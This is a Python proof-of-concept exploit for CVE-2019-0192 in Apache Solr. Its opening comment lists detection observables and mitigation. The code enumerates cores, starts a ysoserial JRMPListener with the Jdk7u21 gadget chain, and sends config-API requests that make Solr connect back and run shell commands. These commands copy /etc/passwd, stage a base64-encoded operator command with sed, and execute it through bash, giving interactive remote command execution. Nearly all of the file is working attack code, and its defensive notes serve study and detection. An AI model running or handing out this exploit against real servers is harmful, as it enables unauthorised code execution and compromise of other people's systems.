# Proof-of-concept driver for CVE-2019-0192 (Apache Solr; the affected version
# ranges are the ones printed in the __main__ banner below). The script POSTs to
# a core's /config handler and sets the JMX property `jmx.serviceUrl` to an
# RMI/JNDI URL pointing at a ysoserial JRMPListener it starts locally (gadget
# chain "Jdk7u21"); each POST therefore makes the Solr JVM reach out to that
# listener and run one shell command.
#
# Defender-relevant observables, all taken from the requests and commands below:
#   - recon:    GET  /solr/admin/cores?wt=json  (used to learn a core name)
#   - trigger:  POST /solr/<core>/config with JSON body
#               {"set-property": {"jmx.serviceUrl":
#                 "service:jmx:rmi:///jndi/rmi://<host>:<port>/obj"}}
#               followed by an outbound RMI connection from the Solr host to
#               <host>:<port> (port 1099 in this script)
#   - response: HTTP 500; the first step additionally requires the body to
#               contain "undeclared checked exception; nested exception is"
#   - host artifacts: /tmp/passwd rewritten in place, pwn.txt written to the
#               Solr process's working directory, `bash` spawned by the JVM
#   - timing:   six POSTs roughly 3 s apart per operator command
# Mitigation: move off the affected versions; because the trigger is ordinary
# config-API traffic, alert on set-property of jmx.serviceUrl and on egress
# RMI/JRMP connections originating from Solr hosts.
import base64
import requests
import subprocess
import signal
import sys
import os
import time
import re

# Target base URL and the callback endpoint the Solr JVM is told to connect to.
# Lab values; `ressource` is filled in at runtime with "/solr/<core>/config".
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"   # host the JRMPListener is reachable on, from Solr's view
RPORT = "1099"         # JRMPListener port (also what the RMI URL points at)
proxy = { }            # passed to requests.get(); empty means direct connection


def exploit(command):
    """Print the ysoserial JRMPListener command line for *command*.

    This only prints guidance and is never called from this file; the
    __main__ loop below starts the listener itself via subprocess.Popen.
    """
    print("\n Run the malicious RMI server using yoserial by running this command:")
    print("\n java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21" + command)


if __name__ == "__main__":
    print("\nCVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5\n")

    # Recon step: enumerate cores so a valid /solr/<core>/config path exists.
    # verify=False disables TLS verification; moot for the plain-http default above.
    print("[+] Checking if ressource available =>", end=' ')
    burp0_url = remote + "/solr/admin/cores?wt=json"
    r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False)
    if r.status_code == 200:
        if r.json()['status'] == "":
            print("KO")
            sys.exit()
        else:
            # The keys of "status" are core names; the first one is used.
            a = list(r.json()['status'].keys())
            ressource = "/solr/" + a[0] + "/config"
            print(ressource)
    else:
        print("KO")
        sys.exit()

    # Interactive loop: one operator command -> six listener/POST rounds.
    # "not reflected": command output is never read back; the script only
    # reports OK/KO from the HTTP status of each trigger request.
    while True:
        try:
            command = input("command (\033[92mnot reflected\033[0m)> ")
            if command == "exit":
                print("Exiting...")
                break
            # The command travels base64-encoded inside a sed s/…/…/g expression
            # (step 4 below), where '/' would act as the sed delimiter, hence the
            # replacement here.
            command = base64.b64encode(command.encode('utf-8'))
            command_str = command.decode('utf-8')
            command_str = command_str.replace('/', '+')

            # Step 1: start a listener that serves the "cp /etc/passwd /tmp/passwd"
            # payload, then trigger it. preexec_fn=os.setsid puts the java process
            # in its own process group so os.killpg() can stop it after the step.
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'cp /etc/passwd /tmp/passwd'", stdout=subprocess.PIPE,shell=True, preexec_fn=os.setsid)
            print("[+] Copy file to tmp directory =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                # Only this first round checks the 500 body; the exception text
                # is taken as evidence that Solr actually attempted the RMI call.
                m = re.search('(undeclared checked exception; nested exception is)', r.text)
                if m:
                    print("\033[92mOK\033[0m")
                else:
                    print("\n[-] Error")
                    os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                    sys.exit()
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            # Stop the listener; the pause presumably lets the port free up
            # before the next listener binds to it.
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)

            # Step 2: replace line 1 of the copied file with the marker "pwn".
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1cpwn /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
            print("[+] Preparing file =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)

            # Step 3: delete every other line so only the marker line remains.
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i /[^pwn]/d /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
            print("[+] Cleaning temp file =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)

            # Step 4: turn the marker line into a shell one-liner that base64-
            # decodes command_str into pwn.txt (brace expansion avoids spaces).
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'sed -i 1s/pwn/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
            print("[+] Writing command into temp file =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)

            # Step 5: run the staged one-liner, which writes pwn.txt in the Solr
            # process's working directory.
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash /tmp/passwd'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
            print("[+] Decode base64 command =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)

            # Step 6: execute the decoded operator command from pwn.txt.
            pro = subprocess.Popen( "java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener " + RPORT + " Jdk7u21 'bash pwn.txt'", stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
            print("[+] Executing command =>", end=' ')
            burp0_url = remote + ressource
            burp0_headers = {"Content-Type": "application/json"}
            burp0_json = { "set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://" + RHOST + ":" + RPORT + "/obj"}}
            r = requests.post( burp0_url, headers=burp0_headers, json=burp0_json)
            if r.status_code == 500:
                print("\033[92mOK\033[0m")
            else:
                print("KO")
                os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
                sys.exit()
            os.killpg(os.getpgid(pro.pid), signal.SIGTERM)
            time.sleep(3)
        except KeyboardInterrupt:
            # Ctrl-C ends the loop; a listener started in the current round is
            # not terminated on this path.
            print("Exiting...")
            break